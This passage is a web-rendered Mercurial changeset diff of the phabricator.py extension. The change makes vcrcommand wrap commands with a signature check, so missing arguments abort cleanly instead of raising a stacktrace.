##// END OF EJS Templates
phabricator: avoid a stacktrace when command arguments are missing...
Matt Harbison -
r44918:09f3e003 default
parent child Browse files
Show More
@@ -1,1828 +1,1830 b''
1 # phabricator.py - simple Phabricator integration
1 # phabricator.py - simple Phabricator integration
2 #
2 #
3 # Copyright 2017 Facebook, Inc.
3 # Copyright 2017 Facebook, Inc.
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 """simple Phabricator integration (EXPERIMENTAL)
7 """simple Phabricator integration (EXPERIMENTAL)
8
8
9 This extension provides a ``phabsend`` command which sends a stack of
9 This extension provides a ``phabsend`` command which sends a stack of
10 changesets to Phabricator, and a ``phabread`` command which prints a stack of
10 changesets to Phabricator, and a ``phabread`` command which prints a stack of
11 revisions in a format suitable for :hg:`import`, and a ``phabupdate`` command
11 revisions in a format suitable for :hg:`import`, and a ``phabupdate`` command
12 to update statuses in batch.
12 to update statuses in batch.
13
13
14 A "phabstatus" view for :hg:`show` is also provided; it displays status
14 A "phabstatus" view for :hg:`show` is also provided; it displays status
15 information of Phabricator differentials associated with unfinished
15 information of Phabricator differentials associated with unfinished
16 changesets.
16 changesets.
17
17
18 By default, Phabricator requires ``Test Plan`` which might prevent some
18 By default, Phabricator requires ``Test Plan`` which might prevent some
19 changeset from being sent. The requirement could be disabled by changing
19 changeset from being sent. The requirement could be disabled by changing
20 ``differential.require-test-plan-field`` config server side.
20 ``differential.require-test-plan-field`` config server side.
21
21
22 Config::
22 Config::
23
23
24 [phabricator]
24 [phabricator]
25 # Phabricator URL
25 # Phabricator URL
26 url = https://phab.example.com/
26 url = https://phab.example.com/
27
27
28 # Repo callsign. If a repo has a URL https://$HOST/diffusion/FOO, then its
28 # Repo callsign. If a repo has a URL https://$HOST/diffusion/FOO, then its
29 # callsign is "FOO".
29 # callsign is "FOO".
30 callsign = FOO
30 callsign = FOO
31
31
32 # curl command to use. If not set (default), use builtin HTTP library to
32 # curl command to use. If not set (default), use builtin HTTP library to
33 # communicate. If set, use the specified curl command. This could be useful
33 # communicate. If set, use the specified curl command. This could be useful
34 # if you need to specify advanced options that is not easily supported by
34 # if you need to specify advanced options that is not easily supported by
35 # the internal library.
35 # the internal library.
36 curlcmd = curl --connect-timeout 2 --retry 3 --silent
36 curlcmd = curl --connect-timeout 2 --retry 3 --silent
37
37
38 [auth]
38 [auth]
39 example.schemes = https
39 example.schemes = https
40 example.prefix = phab.example.com
40 example.prefix = phab.example.com
41
41
42 # API token. Get it from https://$HOST/conduit/login/
42 # API token. Get it from https://$HOST/conduit/login/
43 example.phabtoken = cli-xxxxxxxxxxxxxxxxxxxxxxxxxxxx
43 example.phabtoken = cli-xxxxxxxxxxxxxxxxxxxxxxxxxxxx
44 """
44 """
45
45
46 from __future__ import absolute_import
46 from __future__ import absolute_import
47
47
48 import base64
48 import base64
49 import contextlib
49 import contextlib
50 import hashlib
50 import hashlib
51 import itertools
51 import itertools
52 import json
52 import json
53 import mimetypes
53 import mimetypes
54 import operator
54 import operator
55 import re
55 import re
56
56
57 from mercurial.node import bin, nullid
57 from mercurial.node import bin, nullid
58 from mercurial.i18n import _
58 from mercurial.i18n import _
59 from mercurial.pycompat import getattr
59 from mercurial.pycompat import getattr
60 from mercurial.thirdparty import attr
60 from mercurial.thirdparty import attr
61 from mercurial import (
61 from mercurial import (
62 cmdutil,
62 cmdutil,
63 context,
63 context,
64 encoding,
64 encoding,
65 error,
65 error,
66 exthelper,
66 exthelper,
67 graphmod,
67 graphmod,
68 httpconnection as httpconnectionmod,
68 httpconnection as httpconnectionmod,
69 localrepo,
69 localrepo,
70 logcmdutil,
70 logcmdutil,
71 match,
71 match,
72 mdiff,
72 mdiff,
73 obsutil,
73 obsutil,
74 parser,
74 parser,
75 patch,
75 patch,
76 phases,
76 phases,
77 pycompat,
77 pycompat,
78 scmutil,
78 scmutil,
79 smartset,
79 smartset,
80 tags,
80 tags,
81 templatefilters,
81 templatefilters,
82 templateutil,
82 templateutil,
83 url as urlmod,
83 url as urlmod,
84 util,
84 util,
85 )
85 )
86 from mercurial.utils import (
86 from mercurial.utils import (
87 procutil,
87 procutil,
88 stringutil,
88 stringutil,
89 )
89 )
90 from . import show
90 from . import show
91
91
92
92
93 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
93 # Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
94 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
94 # extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
95 # be specifying the version(s) of Mercurial they are tested with, or
95 # be specifying the version(s) of Mercurial they are tested with, or
96 # leave the attribute unspecified.
96 # leave the attribute unspecified.
97 testedwith = b'ships-with-hg-core'
97 testedwith = b'ships-with-hg-core'
98
98
99 eh = exthelper.exthelper()
99 eh = exthelper.exthelper()
100
100
101 cmdtable = eh.cmdtable
101 cmdtable = eh.cmdtable
102 command = eh.command
102 command = eh.command
103 configtable = eh.configtable
103 configtable = eh.configtable
104 templatekeyword = eh.templatekeyword
104 templatekeyword = eh.templatekeyword
105 uisetup = eh.finaluisetup
105 uisetup = eh.finaluisetup
106
106
107 # developer config: phabricator.batchsize
107 # developer config: phabricator.batchsize
108 eh.configitem(
108 eh.configitem(
109 b'phabricator', b'batchsize', default=12,
109 b'phabricator', b'batchsize', default=12,
110 )
110 )
111 eh.configitem(
111 eh.configitem(
112 b'phabricator', b'callsign', default=None,
112 b'phabricator', b'callsign', default=None,
113 )
113 )
114 eh.configitem(
114 eh.configitem(
115 b'phabricator', b'curlcmd', default=None,
115 b'phabricator', b'curlcmd', default=None,
116 )
116 )
117 # developer config: phabricator.repophid
117 # developer config: phabricator.repophid
118 eh.configitem(
118 eh.configitem(
119 b'phabricator', b'repophid', default=None,
119 b'phabricator', b'repophid', default=None,
120 )
120 )
121 eh.configitem(
121 eh.configitem(
122 b'phabricator', b'url', default=None,
122 b'phabricator', b'url', default=None,
123 )
123 )
124 eh.configitem(
124 eh.configitem(
125 b'phabsend', b'confirm', default=False,
125 b'phabsend', b'confirm', default=False,
126 )
126 )
127
127
128 colortable = {
128 colortable = {
129 b'phabricator.action.created': b'green',
129 b'phabricator.action.created': b'green',
130 b'phabricator.action.skipped': b'magenta',
130 b'phabricator.action.skipped': b'magenta',
131 b'phabricator.action.updated': b'magenta',
131 b'phabricator.action.updated': b'magenta',
132 b'phabricator.desc': b'',
132 b'phabricator.desc': b'',
133 b'phabricator.drev': b'bold',
133 b'phabricator.drev': b'bold',
134 b'phabricator.node': b'',
134 b'phabricator.node': b'',
135 b'phabricator.status.abandoned': b'magenta dim',
135 b'phabricator.status.abandoned': b'magenta dim',
136 b'phabricator.status.accepted': b'green bold',
136 b'phabricator.status.accepted': b'green bold',
137 b'phabricator.status.closed': b'green',
137 b'phabricator.status.closed': b'green',
138 b'phabricator.status.needsreview': b'yellow',
138 b'phabricator.status.needsreview': b'yellow',
139 b'phabricator.status.needsrevision': b'red',
139 b'phabricator.status.needsrevision': b'red',
140 b'phabricator.status.changesplanned': b'red',
140 b'phabricator.status.changesplanned': b'red',
141 }
141 }
142
142
143 _VCR_FLAGS = [
143 _VCR_FLAGS = [
144 (
144 (
145 b'',
145 b'',
146 b'test-vcr',
146 b'test-vcr',
147 b'',
147 b'',
148 _(
148 _(
149 b'Path to a vcr file. If nonexistent, will record a new vcr transcript'
149 b'Path to a vcr file. If nonexistent, will record a new vcr transcript'
150 b', otherwise will mock all http requests using the specified vcr file.'
150 b', otherwise will mock all http requests using the specified vcr file.'
151 b' (ADVANCED)'
151 b' (ADVANCED)'
152 ),
152 ),
153 ),
153 ),
154 ]
154 ]
155
155
156
156
157 @eh.wrapfunction(localrepo, "loadhgrc")
157 @eh.wrapfunction(localrepo, "loadhgrc")
158 def _loadhgrc(orig, ui, wdirvfs, hgvfs, requirements):
158 def _loadhgrc(orig, ui, wdirvfs, hgvfs, requirements):
159 """Load ``.arcconfig`` content into a ui instance on repository open.
159 """Load ``.arcconfig`` content into a ui instance on repository open.
160 """
160 """
161 result = False
161 result = False
162 arcconfig = {}
162 arcconfig = {}
163
163
164 try:
164 try:
165 # json.loads only accepts bytes from 3.6+
165 # json.loads only accepts bytes from 3.6+
166 rawparams = encoding.unifromlocal(wdirvfs.read(b".arcconfig"))
166 rawparams = encoding.unifromlocal(wdirvfs.read(b".arcconfig"))
167 # json.loads only returns unicode strings
167 # json.loads only returns unicode strings
168 arcconfig = pycompat.rapply(
168 arcconfig = pycompat.rapply(
169 lambda x: encoding.unitolocal(x)
169 lambda x: encoding.unitolocal(x)
170 if isinstance(x, pycompat.unicode)
170 if isinstance(x, pycompat.unicode)
171 else x,
171 else x,
172 pycompat.json_loads(rawparams),
172 pycompat.json_loads(rawparams),
173 )
173 )
174
174
175 result = True
175 result = True
176 except ValueError:
176 except ValueError:
177 ui.warn(_(b"invalid JSON in %s\n") % wdirvfs.join(b".arcconfig"))
177 ui.warn(_(b"invalid JSON in %s\n") % wdirvfs.join(b".arcconfig"))
178 except IOError:
178 except IOError:
179 pass
179 pass
180
180
181 cfg = util.sortdict()
181 cfg = util.sortdict()
182
182
183 if b"repository.callsign" in arcconfig:
183 if b"repository.callsign" in arcconfig:
184 cfg[(b"phabricator", b"callsign")] = arcconfig[b"repository.callsign"]
184 cfg[(b"phabricator", b"callsign")] = arcconfig[b"repository.callsign"]
185
185
186 if b"phabricator.uri" in arcconfig:
186 if b"phabricator.uri" in arcconfig:
187 cfg[(b"phabricator", b"url")] = arcconfig[b"phabricator.uri"]
187 cfg[(b"phabricator", b"url")] = arcconfig[b"phabricator.uri"]
188
188
189 if cfg:
189 if cfg:
190 ui.applyconfig(cfg, source=wdirvfs.join(b".arcconfig"))
190 ui.applyconfig(cfg, source=wdirvfs.join(b".arcconfig"))
191
191
192 return orig(ui, wdirvfs, hgvfs, requirements) or result # Load .hg/hgrc
192 return orig(ui, wdirvfs, hgvfs, requirements) or result # Load .hg/hgrc
193
193
194
194
195 def vcrcommand(name, flags, spec, helpcategory=None, optionalrepo=False):
195 def vcrcommand(name, flags, spec, helpcategory=None, optionalrepo=False):
196 fullflags = flags + _VCR_FLAGS
196 fullflags = flags + _VCR_FLAGS
197
197
198 def hgmatcher(r1, r2):
198 def hgmatcher(r1, r2):
199 if r1.uri != r2.uri or r1.method != r2.method:
199 if r1.uri != r2.uri or r1.method != r2.method:
200 return False
200 return False
201 r1params = util.urlreq.parseqs(r1.body)
201 r1params = util.urlreq.parseqs(r1.body)
202 r2params = util.urlreq.parseqs(r2.body)
202 r2params = util.urlreq.parseqs(r2.body)
203 for key in r1params:
203 for key in r1params:
204 if key not in r2params:
204 if key not in r2params:
205 return False
205 return False
206 value = r1params[key][0]
206 value = r1params[key][0]
207 # we want to compare json payloads without worrying about ordering
207 # we want to compare json payloads without worrying about ordering
208 if value.startswith(b'{') and value.endswith(b'}'):
208 if value.startswith(b'{') and value.endswith(b'}'):
209 r1json = pycompat.json_loads(value)
209 r1json = pycompat.json_loads(value)
210 r2json = pycompat.json_loads(r2params[key][0])
210 r2json = pycompat.json_loads(r2params[key][0])
211 if r1json != r2json:
211 if r1json != r2json:
212 return False
212 return False
213 elif r2params[key][0] != value:
213 elif r2params[key][0] != value:
214 return False
214 return False
215 return True
215 return True
216
216
217 def sanitiserequest(request):
217 def sanitiserequest(request):
218 request.body = re.sub(
218 request.body = re.sub(
219 br'cli-[a-z0-9]+', br'cli-hahayouwish', request.body
219 br'cli-[a-z0-9]+', br'cli-hahayouwish', request.body
220 )
220 )
221 return request
221 return request
222
222
223 def sanitiseresponse(response):
223 def sanitiseresponse(response):
224 if 'set-cookie' in response['headers']:
224 if 'set-cookie' in response['headers']:
225 del response['headers']['set-cookie']
225 del response['headers']['set-cookie']
226 return response
226 return response
227
227
228 def decorate(fn):
228 def decorate(fn):
229 def inner(*args, **kwargs):
229 def inner(*args, **kwargs):
230 cassette = pycompat.fsdecode(kwargs.pop('test_vcr', None))
230 cassette = pycompat.fsdecode(kwargs.pop('test_vcr', None))
231 if cassette:
231 if cassette:
232 import hgdemandimport
232 import hgdemandimport
233
233
234 with hgdemandimport.deactivated():
234 with hgdemandimport.deactivated():
235 import vcr as vcrmod
235 import vcr as vcrmod
236 import vcr.stubs as stubs
236 import vcr.stubs as stubs
237
237
238 vcr = vcrmod.VCR(
238 vcr = vcrmod.VCR(
239 serializer='json',
239 serializer='json',
240 before_record_request=sanitiserequest,
240 before_record_request=sanitiserequest,
241 before_record_response=sanitiseresponse,
241 before_record_response=sanitiseresponse,
242 custom_patches=[
242 custom_patches=[
243 (
243 (
244 urlmod,
244 urlmod,
245 'httpconnection',
245 'httpconnection',
246 stubs.VCRHTTPConnection,
246 stubs.VCRHTTPConnection,
247 ),
247 ),
248 (
248 (
249 urlmod,
249 urlmod,
250 'httpsconnection',
250 'httpsconnection',
251 stubs.VCRHTTPSConnection,
251 stubs.VCRHTTPSConnection,
252 ),
252 ),
253 ],
253 ],
254 )
254 )
255 vcr.register_matcher('hgmatcher', hgmatcher)
255 vcr.register_matcher('hgmatcher', hgmatcher)
256 with vcr.use_cassette(cassette, match_on=['hgmatcher']):
256 with vcr.use_cassette(cassette, match_on=['hgmatcher']):
257 return fn(*args, **kwargs)
257 return fn(*args, **kwargs)
258 return fn(*args, **kwargs)
258 return fn(*args, **kwargs)
259
259
260 inner.__name__ = fn.__name__
260 cmd = util.checksignature(inner, depth=2)
261 inner.__doc__ = fn.__doc__
261 cmd.__name__ = fn.__name__
262 cmd.__doc__ = fn.__doc__
263
262 return command(
264 return command(
263 name,
265 name,
264 fullflags,
266 fullflags,
265 spec,
267 spec,
266 helpcategory=helpcategory,
268 helpcategory=helpcategory,
267 optionalrepo=optionalrepo,
269 optionalrepo=optionalrepo,
268 )(inner)
270 )(cmd)
269
271
270 return decorate
272 return decorate
271
273
272
274
273 def urlencodenested(params):
275 def urlencodenested(params):
274 """like urlencode, but works with nested parameters.
276 """like urlencode, but works with nested parameters.
275
277
276 For example, if params is {'a': ['b', 'c'], 'd': {'e': 'f'}}, it will be
278 For example, if params is {'a': ['b', 'c'], 'd': {'e': 'f'}}, it will be
277 flattened to {'a[0]': 'b', 'a[1]': 'c', 'd[e]': 'f'} and then passed to
279 flattened to {'a[0]': 'b', 'a[1]': 'c', 'd[e]': 'f'} and then passed to
278 urlencode. Note: the encoding is consistent with PHP's http_build_query.
280 urlencode. Note: the encoding is consistent with PHP's http_build_query.
279 """
281 """
280 flatparams = util.sortdict()
282 flatparams = util.sortdict()
281
283
282 def process(prefix, obj):
284 def process(prefix, obj):
283 if isinstance(obj, bool):
285 if isinstance(obj, bool):
284 obj = {True: b'true', False: b'false'}[obj] # Python -> PHP form
286 obj = {True: b'true', False: b'false'}[obj] # Python -> PHP form
285 lister = lambda l: [(b'%d' % k, v) for k, v in enumerate(l)]
287 lister = lambda l: [(b'%d' % k, v) for k, v in enumerate(l)]
286 items = {list: lister, dict: lambda x: x.items()}.get(type(obj))
288 items = {list: lister, dict: lambda x: x.items()}.get(type(obj))
287 if items is None:
289 if items is None:
288 flatparams[prefix] = obj
290 flatparams[prefix] = obj
289 else:
291 else:
290 for k, v in items(obj):
292 for k, v in items(obj):
291 if prefix:
293 if prefix:
292 process(b'%s[%s]' % (prefix, k), v)
294 process(b'%s[%s]' % (prefix, k), v)
293 else:
295 else:
294 process(k, v)
296 process(k, v)
295
297
296 process(b'', params)
298 process(b'', params)
297 return util.urlreq.urlencode(flatparams)
299 return util.urlreq.urlencode(flatparams)
298
300
299
301
300 def readurltoken(ui):
302 def readurltoken(ui):
301 """return conduit url, token and make sure they exist
303 """return conduit url, token and make sure they exist
302
304
303 Currently read from [auth] config section. In the future, it might
305 Currently read from [auth] config section. In the future, it might
304 make sense to read from .arcconfig and .arcrc as well.
306 make sense to read from .arcconfig and .arcrc as well.
305 """
307 """
306 url = ui.config(b'phabricator', b'url')
308 url = ui.config(b'phabricator', b'url')
307 if not url:
309 if not url:
308 raise error.Abort(
310 raise error.Abort(
309 _(b'config %s.%s is required') % (b'phabricator', b'url')
311 _(b'config %s.%s is required') % (b'phabricator', b'url')
310 )
312 )
311
313
312 res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user)
314 res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user)
313 token = None
315 token = None
314
316
315 if res:
317 if res:
316 group, auth = res
318 group, auth = res
317
319
318 ui.debug(b"using auth.%s.* for authentication\n" % group)
320 ui.debug(b"using auth.%s.* for authentication\n" % group)
319
321
320 token = auth.get(b'phabtoken')
322 token = auth.get(b'phabtoken')
321
323
322 if not token:
324 if not token:
323 raise error.Abort(
325 raise error.Abort(
324 _(b'Can\'t find conduit token associated to %s') % (url,)
326 _(b'Can\'t find conduit token associated to %s') % (url,)
325 )
327 )
326
328
327 return url, token
329 return url, token
328
330
329
331
330 def callconduit(ui, name, params):
332 def callconduit(ui, name, params):
331 """call Conduit API, params is a dict. return json.loads result, or None"""
333 """call Conduit API, params is a dict. return json.loads result, or None"""
332 host, token = readurltoken(ui)
334 host, token = readurltoken(ui)
333 url, authinfo = util.url(b'/'.join([host, b'api', name])).authinfo()
335 url, authinfo = util.url(b'/'.join([host, b'api', name])).authinfo()
334 ui.debug(b'Conduit Call: %s %s\n' % (url, pycompat.byterepr(params)))
336 ui.debug(b'Conduit Call: %s %s\n' % (url, pycompat.byterepr(params)))
335 params = params.copy()
337 params = params.copy()
336 params[b'__conduit__'] = {
338 params[b'__conduit__'] = {
337 b'token': token,
339 b'token': token,
338 }
340 }
339 rawdata = {
341 rawdata = {
340 b'params': templatefilters.json(params),
342 b'params': templatefilters.json(params),
341 b'output': b'json',
343 b'output': b'json',
342 b'__conduit__': 1,
344 b'__conduit__': 1,
343 }
345 }
344 data = urlencodenested(rawdata)
346 data = urlencodenested(rawdata)
345 curlcmd = ui.config(b'phabricator', b'curlcmd')
347 curlcmd = ui.config(b'phabricator', b'curlcmd')
346 if curlcmd:
348 if curlcmd:
347 sin, sout = procutil.popen2(
349 sin, sout = procutil.popen2(
348 b'%s -d @- %s' % (curlcmd, procutil.shellquote(url))
350 b'%s -d @- %s' % (curlcmd, procutil.shellquote(url))
349 )
351 )
350 sin.write(data)
352 sin.write(data)
351 sin.close()
353 sin.close()
352 body = sout.read()
354 body = sout.read()
353 else:
355 else:
354 urlopener = urlmod.opener(ui, authinfo)
356 urlopener = urlmod.opener(ui, authinfo)
355 request = util.urlreq.request(pycompat.strurl(url), data=data)
357 request = util.urlreq.request(pycompat.strurl(url), data=data)
356 with contextlib.closing(urlopener.open(request)) as rsp:
358 with contextlib.closing(urlopener.open(request)) as rsp:
357 body = rsp.read()
359 body = rsp.read()
358 ui.debug(b'Conduit Response: %s\n' % body)
360 ui.debug(b'Conduit Response: %s\n' % body)
359 parsed = pycompat.rapply(
361 parsed = pycompat.rapply(
360 lambda x: encoding.unitolocal(x)
362 lambda x: encoding.unitolocal(x)
361 if isinstance(x, pycompat.unicode)
363 if isinstance(x, pycompat.unicode)
362 else x,
364 else x,
363 # json.loads only accepts bytes from py3.6+
365 # json.loads only accepts bytes from py3.6+
364 pycompat.json_loads(encoding.unifromlocal(body)),
366 pycompat.json_loads(encoding.unifromlocal(body)),
365 )
367 )
366 if parsed.get(b'error_code'):
368 if parsed.get(b'error_code'):
367 msg = _(b'Conduit Error (%s): %s') % (
369 msg = _(b'Conduit Error (%s): %s') % (
368 parsed[b'error_code'],
370 parsed[b'error_code'],
369 parsed[b'error_info'],
371 parsed[b'error_info'],
370 )
372 )
371 raise error.Abort(msg)
373 raise error.Abort(msg)
372 return parsed[b'result']
374 return parsed[b'result']
373
375
374
376
375 @vcrcommand(b'debugcallconduit', [], _(b'METHOD'), optionalrepo=True)
377 @vcrcommand(b'debugcallconduit', [], _(b'METHOD'), optionalrepo=True)
376 def debugcallconduit(ui, repo, name):
378 def debugcallconduit(ui, repo, name):
377 """call Conduit API
379 """call Conduit API
378
380
379 Call parameters are read from stdin as a JSON blob. Result will be written
381 Call parameters are read from stdin as a JSON blob. Result will be written
380 to stdout as a JSON blob.
382 to stdout as a JSON blob.
381 """
383 """
382 # json.loads only accepts bytes from 3.6+
384 # json.loads only accepts bytes from 3.6+
383 rawparams = encoding.unifromlocal(ui.fin.read())
385 rawparams = encoding.unifromlocal(ui.fin.read())
384 # json.loads only returns unicode strings
386 # json.loads only returns unicode strings
385 params = pycompat.rapply(
387 params = pycompat.rapply(
386 lambda x: encoding.unitolocal(x)
388 lambda x: encoding.unitolocal(x)
387 if isinstance(x, pycompat.unicode)
389 if isinstance(x, pycompat.unicode)
388 else x,
390 else x,
389 pycompat.json_loads(rawparams),
391 pycompat.json_loads(rawparams),
390 )
392 )
391 # json.dumps only accepts unicode strings
393 # json.dumps only accepts unicode strings
392 result = pycompat.rapply(
394 result = pycompat.rapply(
393 lambda x: encoding.unifromlocal(x) if isinstance(x, bytes) else x,
395 lambda x: encoding.unifromlocal(x) if isinstance(x, bytes) else x,
394 callconduit(ui, name, params),
396 callconduit(ui, name, params),
395 )
397 )
396 s = json.dumps(result, sort_keys=True, indent=2, separators=(u',', u': '))
398 s = json.dumps(result, sort_keys=True, indent=2, separators=(u',', u': '))
397 ui.write(b'%s\n' % encoding.unitolocal(s))
399 ui.write(b'%s\n' % encoding.unitolocal(s))
398
400
399
401
400 def getrepophid(repo):
402 def getrepophid(repo):
401 """given callsign, return repository PHID or None"""
403 """given callsign, return repository PHID or None"""
402 # developer config: phabricator.repophid
404 # developer config: phabricator.repophid
403 repophid = repo.ui.config(b'phabricator', b'repophid')
405 repophid = repo.ui.config(b'phabricator', b'repophid')
404 if repophid:
406 if repophid:
405 return repophid
407 return repophid
406 callsign = repo.ui.config(b'phabricator', b'callsign')
408 callsign = repo.ui.config(b'phabricator', b'callsign')
407 if not callsign:
409 if not callsign:
408 return None
410 return None
409 query = callconduit(
411 query = callconduit(
410 repo.ui,
412 repo.ui,
411 b'diffusion.repository.search',
413 b'diffusion.repository.search',
412 {b'constraints': {b'callsigns': [callsign]}},
414 {b'constraints': {b'callsigns': [callsign]}},
413 )
415 )
414 if len(query[b'data']) == 0:
416 if len(query[b'data']) == 0:
415 return None
417 return None
416 repophid = query[b'data'][0][b'phid']
418 repophid = query[b'data'][0][b'phid']
417 repo.ui.setconfig(b'phabricator', b'repophid', repophid)
419 repo.ui.setconfig(b'phabricator', b'repophid', repophid)
418 return repophid
420 return repophid
419
421
420
422
421 _differentialrevisiontagre = re.compile(br'\AD([1-9][0-9]*)\Z')
423 _differentialrevisiontagre = re.compile(br'\AD([1-9][0-9]*)\Z')
422 _differentialrevisiondescre = re.compile(
424 _differentialrevisiondescre = re.compile(
423 br'^Differential Revision:\s*(?P<url>(?:.*)D(?P<id>[1-9][0-9]*))$', re.M
425 br'^Differential Revision:\s*(?P<url>(?:.*)D(?P<id>[1-9][0-9]*))$', re.M
424 )
426 )
425
427
426
428
427 def getoldnodedrevmap(repo, nodelist):
429 def getoldnodedrevmap(repo, nodelist):
428 """find previous nodes that has been sent to Phabricator
430 """find previous nodes that has been sent to Phabricator
429
431
430 return {node: (oldnode, Differential diff, Differential Revision ID)}
432 return {node: (oldnode, Differential diff, Differential Revision ID)}
431 for node in nodelist with known previous sent versions, or associated
433 for node in nodelist with known previous sent versions, or associated
432 Differential Revision IDs. ``oldnode`` and ``Differential diff`` could
434 Differential Revision IDs. ``oldnode`` and ``Differential diff`` could
433 be ``None``.
435 be ``None``.
434
436
435 Examines commit messages like "Differential Revision:" to get the
437 Examines commit messages like "Differential Revision:" to get the
436 association information.
438 association information.
437
439
438 If such commit message line is not found, examines all precursors and their
440 If such commit message line is not found, examines all precursors and their
439 tags. Tags with format like "D1234" are considered a match and the node
441 tags. Tags with format like "D1234" are considered a match and the node
440 with that tag, and the number after "D" (ex. 1234) will be returned.
442 with that tag, and the number after "D" (ex. 1234) will be returned.
441
443
442 The ``old node``, if not None, is guaranteed to be the last diff of
444 The ``old node``, if not None, is guaranteed to be the last diff of
443 corresponding Differential Revision, and exist in the repo.
445 corresponding Differential Revision, and exist in the repo.
444 """
446 """
445 unfi = repo.unfiltered()
447 unfi = repo.unfiltered()
446 has_node = unfi.changelog.index.has_node
448 has_node = unfi.changelog.index.has_node
447
449
448 result = {} # {node: (oldnode?, lastdiff?, drev)}
450 result = {} # {node: (oldnode?, lastdiff?, drev)}
449 toconfirm = {} # {node: (force, {precnode}, drev)}
451 toconfirm = {} # {node: (force, {precnode}, drev)}
450 for node in nodelist:
452 for node in nodelist:
451 ctx = unfi[node]
453 ctx = unfi[node]
452 # For tags like "D123", put them into "toconfirm" to verify later
454 # For tags like "D123", put them into "toconfirm" to verify later
453 precnodes = list(obsutil.allpredecessors(unfi.obsstore, [node]))
455 precnodes = list(obsutil.allpredecessors(unfi.obsstore, [node]))
454 for n in precnodes:
456 for n in precnodes:
455 if has_node(n):
457 if has_node(n):
456 for tag in unfi.nodetags(n):
458 for tag in unfi.nodetags(n):
457 m = _differentialrevisiontagre.match(tag)
459 m = _differentialrevisiontagre.match(tag)
458 if m:
460 if m:
459 toconfirm[node] = (0, set(precnodes), int(m.group(1)))
461 toconfirm[node] = (0, set(precnodes), int(m.group(1)))
460 break
462 break
461 else:
463 else:
462 continue # move to next predecessor
464 continue # move to next predecessor
463 break # found a tag, stop
465 break # found a tag, stop
464 else:
466 else:
465 # Check commit message
467 # Check commit message
466 m = _differentialrevisiondescre.search(ctx.description())
468 m = _differentialrevisiondescre.search(ctx.description())
467 if m:
469 if m:
468 toconfirm[node] = (1, set(precnodes), int(m.group('id')))
470 toconfirm[node] = (1, set(precnodes), int(m.group('id')))
469
471
470 # Double check if tags are genuine by collecting all old nodes from
472 # Double check if tags are genuine by collecting all old nodes from
471 # Phabricator, and expect precursors overlap with it.
473 # Phabricator, and expect precursors overlap with it.
472 if toconfirm:
474 if toconfirm:
473 drevs = [drev for force, precs, drev in toconfirm.values()]
475 drevs = [drev for force, precs, drev in toconfirm.values()]
474 alldiffs = callconduit(
476 alldiffs = callconduit(
475 unfi.ui, b'differential.querydiffs', {b'revisionIDs': drevs}
477 unfi.ui, b'differential.querydiffs', {b'revisionIDs': drevs}
476 )
478 )
477 getnode = lambda d: bin(getdiffmeta(d).get(b'node', b'')) or None
479 getnode = lambda d: bin(getdiffmeta(d).get(b'node', b'')) or None
478 for newnode, (force, precset, drev) in toconfirm.items():
480 for newnode, (force, precset, drev) in toconfirm.items():
479 diffs = [
481 diffs = [
480 d for d in alldiffs.values() if int(d[b'revisionID']) == drev
482 d for d in alldiffs.values() if int(d[b'revisionID']) == drev
481 ]
483 ]
482
484
483 # "precursors" as known by Phabricator
485 # "precursors" as known by Phabricator
484 phprecset = set(getnode(d) for d in diffs)
486 phprecset = set(getnode(d) for d in diffs)
485
487
486 # Ignore if precursors (Phabricator and local repo) do not overlap,
488 # Ignore if precursors (Phabricator and local repo) do not overlap,
487 # and force is not set (when commit message says nothing)
489 # and force is not set (when commit message says nothing)
488 if not force and not bool(phprecset & precset):
490 if not force and not bool(phprecset & precset):
489 tagname = b'D%d' % drev
491 tagname = b'D%d' % drev
490 tags.tag(
492 tags.tag(
491 repo,
493 repo,
492 tagname,
494 tagname,
493 nullid,
495 nullid,
494 message=None,
496 message=None,
495 user=None,
497 user=None,
496 date=None,
498 date=None,
497 local=True,
499 local=True,
498 )
500 )
499 unfi.ui.warn(
501 unfi.ui.warn(
500 _(
502 _(
501 b'D%d: local tag removed - does not match '
503 b'D%d: local tag removed - does not match '
502 b'Differential history\n'
504 b'Differential history\n'
503 )
505 )
504 % drev
506 % drev
505 )
507 )
506 continue
508 continue
507
509
508 # Find the last node using Phabricator metadata, and make sure it
510 # Find the last node using Phabricator metadata, and make sure it
509 # exists in the repo
511 # exists in the repo
510 oldnode = lastdiff = None
512 oldnode = lastdiff = None
511 if diffs:
513 if diffs:
512 lastdiff = max(diffs, key=lambda d: int(d[b'id']))
514 lastdiff = max(diffs, key=lambda d: int(d[b'id']))
513 oldnode = getnode(lastdiff)
515 oldnode = getnode(lastdiff)
514 if oldnode and not has_node(oldnode):
516 if oldnode and not has_node(oldnode):
515 oldnode = None
517 oldnode = None
516
518
517 result[newnode] = (oldnode, lastdiff, drev)
519 result[newnode] = (oldnode, lastdiff, drev)
518
520
519 return result
521 return result
520
522
521
523
522 def getdrevmap(repo, revs):
524 def getdrevmap(repo, revs):
523 """Return a dict mapping each rev in `revs` to their Differential Revision
525 """Return a dict mapping each rev in `revs` to their Differential Revision
524 ID or None.
526 ID or None.
525 """
527 """
526 result = {}
528 result = {}
527 for rev in revs:
529 for rev in revs:
528 result[rev] = None
530 result[rev] = None
529 ctx = repo[rev]
531 ctx = repo[rev]
530 # Check commit message
532 # Check commit message
531 m = _differentialrevisiondescre.search(ctx.description())
533 m = _differentialrevisiondescre.search(ctx.description())
532 if m:
534 if m:
533 result[rev] = int(m.group('id'))
535 result[rev] = int(m.group('id'))
534 continue
536 continue
535 # Check tags
537 # Check tags
536 for tag in repo.nodetags(ctx.node()):
538 for tag in repo.nodetags(ctx.node()):
537 m = _differentialrevisiontagre.match(tag)
539 m = _differentialrevisiontagre.match(tag)
538 if m:
540 if m:
539 result[rev] = int(m.group(1))
541 result[rev] = int(m.group(1))
540 break
542 break
541
543
542 return result
544 return result
543
545
544
546
545 def getdiff(ctx, diffopts):
547 def getdiff(ctx, diffopts):
546 """plain-text diff without header (user, commit message, etc)"""
548 """plain-text diff without header (user, commit message, etc)"""
547 output = util.stringio()
549 output = util.stringio()
548 for chunk, _label in patch.diffui(
550 for chunk, _label in patch.diffui(
